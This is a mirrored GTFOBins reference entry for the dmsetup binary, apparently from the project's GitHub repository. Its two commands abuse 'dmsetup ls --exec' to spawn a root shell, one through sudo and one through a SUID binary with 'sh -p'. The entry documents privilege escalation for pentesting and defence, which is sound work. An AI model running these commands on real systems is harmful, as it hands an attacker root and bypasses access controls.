1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/dmsetup.md
egre55 a448ed5c25 Add dmsetup (#31)
* Add dmsetup

* fixes
2018-11-10 18:39:18 +00:00

334 B

functions
sudo suid
code
sudo dmsetup create base <<EOF 0 3534848 linear /dev/loop0 94208 EOF sudo dmsetup ls --exec '/bin/sh -s'
code
./dmsetup create base <<EOF 0 3534848 linear /dev/loop0 94208 EOF ./dmsetup ls --exec '/bin/sh -p -s'